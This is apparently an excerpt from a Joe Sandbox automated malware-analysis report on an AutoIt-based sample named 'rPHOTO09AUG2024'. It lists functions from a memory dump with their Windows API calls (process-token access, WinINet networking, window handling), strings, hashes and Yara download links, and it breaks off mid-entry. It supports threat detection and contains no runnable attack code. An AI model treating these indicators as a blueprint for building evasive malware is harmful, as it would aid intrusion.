Instruction ID: 9653ac1a230446fab64b6d1f4911d4a358006c9cd84abb03972d6ea4002dab1d
Opcode Fuzzy Hash: c8f708cf3042be3710841871a6841091fbb8b0530d558c633a7690bb742c5961
Instruction Fuzzy Hash: CBE03932100746EEDB215F64FC09BD83B11AB05332F08836AFAA9881E187714980DB31

Function 00D98C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00D98C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00D9882E), ref: 00D98C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D9882E), ref: 00D98C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00D9882E), ref: 00D98C7E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 9531a18a15b26f8c58ad025682468e9bf24de18c6433176f2aafefd99883e554
Instruction ID: 70fb73bc0eb48440235efd2b09bfeb2f9af16fbc5357d87e72a7db9cf96ca1b3
Opcode Fuzzy Hash: 9531a18a15b26f8c58ad025682468e9bf24de18c6433176f2aafefd99883e554
Instruction Fuzzy Hash: 09E08676642313EBDB205FB06D0CFD67BADEF51B92F084828F645C9040DA348445DB71

Function 00D82187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D82187
GetDC.USER32(00000000), ref: 00D82191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D821B1
ReleaseDC.USER32(?), ref: 00D821D2

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c6b27e7bda870ed2c26ecf18b2aa93edd2a1390e5cc4c60ad5c83c515d5cf06b
Instruction ID: a1757fef7625f9c082231887bd0af469550c448083434b4fd7b03d4289df9b18
Opcode Fuzzy Hash: c6b27e7bda870ed2c26ecf18b2aa93edd2a1390e5cc4c60ad5c83c515d5cf06b
Instruction Fuzzy Hash: 9EE0E5B5840306EFDB019F60C808AADBBB2EB4C350F108425F95AD7360CB7891419F60

Function 00D8219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D8219B
GetDC.USER32(00000000), ref: 00D821A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D821B1
ReleaseDC.USER32(?), ref: 00D821D2

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c0073b087f54b71fd314bc37982a8fd6280efbd008b6cd3c43047e4797a71262
Instruction ID: c342f40fa6204182812ff1b4f67c33b6f87190daf546b39599a129f5c325b364
Opcode Fuzzy Hash: c0073b087f54b71fd314bc37982a8fd6280efbd008b6cd3c43047e4797a71262
Instruction Fuzzy Hash: F4E0EEB5840306AFCB029FA0C808A9EBBA2EB4C310F108029F95AE7320CB7891419F60

Function 00DBB1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 00DBB2C3

Strings

xr, xrefs: 00DBB2F9
xr, xrefs: 00DBB325

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __itow_s
String ID: xr$xr
API String ID: 3653519197-2528877900
Opcode ID: c76a5a65cfb835a149b991755f9dfe8063bcf0b37e9afd77004f711cf8da442f
Instruction ID: a4ef6151f86b70898353cdc3836ae8cd316ad6418e360b33668e383c58ae06c4
Opcode Fuzzy Hash: c76a5a65cfb835a149b991755f9dfe8063bcf0b37e9afd77004f711cf8da442f
Instruction Fuzzy Hash: BFB15C70A00109EFCB24DF54C891EEAB7B9FF58310F18855AF9469B292DB71E945CB70

Function 00D9B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00D9B981

Strings

Container, xrefs: 00D9B8FE
AutoIt3GUI, xrefs: 00D9B8F9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 5cc38336a9c3633fce2cad2b7f1134a312a3105223e8ed55a819eafa89b01b00
Instruction ID: 16046c529216c2133abae02fed38a2354c336e156a54a9825c7d0ef771df228e
Opcode Fuzzy Hash: 5cc38336a9c3633fce2cad2b7f1134a312a3105223e8ed55a819eafa89b01b00
Instruction Fuzzy Hash: F8914B70600201AFDB24DF68D994B66BBE9FF48710F15856EF949CB691DB70E841CB60

Function 00DAB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5FEC6: _wcscpy.LIBCMT ref: 00D5FEE9

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

__wcsnicmp.LIBCMT ref: 00DAB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00DAB361

Strings

LPT, xrefs: 00DAB292

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: e469cb562e560a06055068e086871860e8078eb64da90139576dcc50153127da
Instruction ID: 62b5b43af8dd9da56a8fcd9ed0a44f18c0e6b11f0977b07bfd6e5f452bdc958f
Opcode Fuzzy Hash: e469cb562e560a06055068e086871860e8078eb64da90139576dcc50153127da
Instruction Fuzzy Hash: 9E617176A00215AFCF14DF94C891EAEB7B4EF09320F15445AF946AB392DB70AE45CB70

Function 00D52AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00D52AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00D52AE1

Strings

@, xrefs: 00D52AD5

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 717125ddc5dff483649f5fd7da324f34e79aacc11689a2a952f7f763dd35c551
Instruction ID: 85d508082eef991db1c174959e7e9dfa43f9ccf3a4ca16915d60ff1b5d4ecfa0
Opcode Fuzzy Hash: 717125ddc5dff483649f5fd7da324f34e79aacc11689a2a952f7f763dd35c551
Instruction Fuzzy Hash: C15146724187459BD320AF11DC96BAFBBE8FF84310F42885DF1D9912A5DB308529CB36

Function 00DA99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00D4506B: __fread_nolock.LIBCMT ref: 00D45089

_wcscmp.LIBCMT ref: 00DA9AAE
_wcscmp.LIBCMT ref: 00DA9AC1

Strings

FILE, xrefs: 00DA99FA

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: a7912e2de031db58b82e362b91b44dc77182d51fe889f178acec20003b6a755c
Instruction ID: 6fd892e634dea32f583eb33505278cc1f5cf14d403170fe9cd01e64b31816b05
Opcode Fuzzy Hash: a7912e2de031db58b82e362b91b44dc77182d51fe889f178acec20003b6a755c
Instruction Fuzzy Hash: 8C41D471A00619BBDF209AA4DC96FEFBBBDDF46710F04407AB900B7185DA75AA0487B1

Function 00D8099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00D809A9

Strings

Dt, xrefs: 00D4A477
Dt, xrefs: 00D4A2B1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClearVariant
String ID: Dt$Dt
API String ID: 1473721057-4168040075
Opcode ID: c44d7de6542921b1b7fdc612d7aa362b444dbcf4f0ae3a6146647af7c8939680
Instruction ID: 65e82872ab90477916d66d5cad39b1e66d07b575e8a1da213d6fdc42ff067b05
Opcode Fuzzy Hash: c44d7de6542921b1b7fdc612d7aa362b444dbcf4f0ae3a6146647af7c8939680
Instruction Fuzzy Hash: 1D51F678A48342CFD754CF19C084A1ABBF1BB99354F58485DE9858B361E332EC85CF62

Function 00DB2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DB2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DB28C8

Strings

|, xrefs: 00DB2899

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 2391458d934b9e0a6cb1d3126a5f5479c77cf4ffdcf0f5cd4242de1dc8759d14
Instruction ID: d6c1f60efb78f630d8a0a12305891bc875ca37ed97dee84747181bb92c4781ab
Opcode Fuzzy Hash: 2391458d934b9e0a6cb1d3126a5f5479c77cf4ffdcf0f5cd4242de1dc8759d14
Instruction Fuzzy Hash: 0E31F871800119ABCF01AFA1DC85EEEBFB9FF08350F144069F815A6166EB319A56DBB0

Function 00DC6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00DC6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DC6DC2

Strings

static, xrefs: 00DC6D22

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 870417f537390da34c508683df39b640369a9b67a6484bf9836b82773911f823
Instruction ID: ec21f2c1de0d25182c165abd5dec3d1cccd09e795bc2a2bee4830b7d935f5fbc
Opcode Fuzzy Hash: 870417f537390da34c508683df39b640369a9b67a6484bf9836b82773911f823
Instruction Fuzzy Hash: C3316A71200606AADB109F68CC81FFB77A9FF48724F14861DF9A697190DA31EC91CB70

Function 00DA2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DA2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DA2E3B

Strings

0, xrefs: 00DA2DF9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 969c3dc4e480349bea606df1b065cf80f9d676149f583feb924b3847f7019f34
Instruction ID: cc79a9157c5a1b2dcfd655590baddb3ec18e82ee92b1de7729914d1f33fc15de
Opcode Fuzzy Hash: 969c3dc4e480349bea606df1b065cf80f9d676149f583feb924b3847f7019f34
Instruction Fuzzy Hash: 6531D731600305ABEB248F5EC945BBEBBB5EF06350F184029F985D61A1D770DA84CB70

Function 00DB3CDD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00DB3D5A

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Strings

, $, xrefs: 00DB3D9A
AUTOITCALLVARIABLE%d, xrefs: 00DB3D4C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: ff8640b52a5505e0f737eb5752530bc955979b708269edc6e690d1f91811fd73
Instruction ID: 7af97ebfe0bb3742528025c6b57f3be99313f3cef54023e805b4ebabcc2689d0
Opcode Fuzzy Hash: ff8640b52a5505e0f737eb5752530bc955979b708269edc6e690d1f91811fd73
Instruction Fuzzy Hash: 8F213C71A00219AFCF10EF65CC92AEDB7A5FF44700F4544A9F905AB281DB70EA45DBB1

Function 00DC6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DC69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC69DB

Strings

Combobox, xrefs: 00DC699D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 925d90daffd2a684163ce7ad9e49b3ba03210146659d288a0008c78bde0b356a
Instruction ID: 07953d40a1c725fd68a851592e7e930e1b178a685015c27e601eaaacd58bc498
Opcode Fuzzy Hash: 925d90daffd2a684163ce7ad9e49b3ba03210146659d288a0008c78bde0b356a
Instruction Fuzzy Hash: BC11827160020A6FEF119F24CC91FFB376AEB993A4F154229F95897290DA71DC918BB0

Function 00DC6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00D41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D41D73
Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91

GetWindowRect.USER32(00000000,?), ref: 00DC6EE0
GetSysColor.USER32(00000012), ref: 00DC6EFA

Strings

static, xrefs: 00DC6EBD

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: c287567f920d0d9b519ebf89714c5ff786e0b33cb0846e75e56220bff811aa82
Instruction ID: 05c1a21d1cb9cb9665375fadb8dfdd324ab55d46a8e153025c4a73180c7ff596
Opcode Fuzzy Hash: c287567f920d0d9b519ebf89714c5ff786e0b33cb0846e75e56220bff811aa82
Instruction Fuzzy Hash: A4215672A1020AAFDB04DFA8CC45EEE7BB9FB08314F04462DF955E3250E734E8619B60

Function 00DC6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00DC6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DC6C20

Strings

edit, xrefs: 00DC6BF5

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: bea42809e4a4a1844f72a59c21a19ba4446d023f302a3ea7ccba6c4898a3b222
Instruction ID: dd50544fd38bc2a7bd209f6d2cb7a3cfe0142e51a58a626bc3ee423e7a484802
Opcode Fuzzy Hash: bea42809e4a4a1844f72a59c21a19ba4446d023f302a3ea7ccba6c4898a3b222
Instruction Fuzzy Hash: 0B11587150020AABEB108F64DC41FEA3B6AEB04378F244728F9A5D71E0C775DC919B70

Function 00DA2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DA2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00DA2F30

Strings

0, xrefs: 00DA2F07

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a634bb9b861e5db60e0a94db420544941cf72b32ccbe03a4280d67593ac99ee8
Instruction ID: 9a10aac9234882ffa998aeb00e5bd3c22c2674d57605c89307e49b20446b7992
Opcode Fuzzy Hash: a634bb9b861e5db60e0a94db420544941cf72b32ccbe03a4280d67593ac99ee8
Instruction Fuzzy Hash: 09118B35A01214AFDB24EB5EDC44BB977B9EF06310F1840A5F894A72A0D7B0EE4887B1

Function 00DB24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DB2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DB2549

Strings

<local>, xrefs: 00DB2511

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: fee8cd5e1068f3f6b9a22d77312a17b3f9c9513abe9af60ccd96deac1bfba375
Instruction ID: e24d245bf1c0ad7f81d949d76f7c4f2fa7d754dabf2d0c809230562a54545fac
Opcode Fuzzy Hash: fee8cd5e1068f3f6b9a22d77312a17b3f9c9513abe9af60ccd96deac1bfba375
Instruction Fuzzy Hash: 13110672500226FEDB348F518C95EFBFFA8FF15751F10822AF54652140D270A944D6F0

Function 00DB80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00DB80C8,?,00000000,?,?), ref: 00DB8322

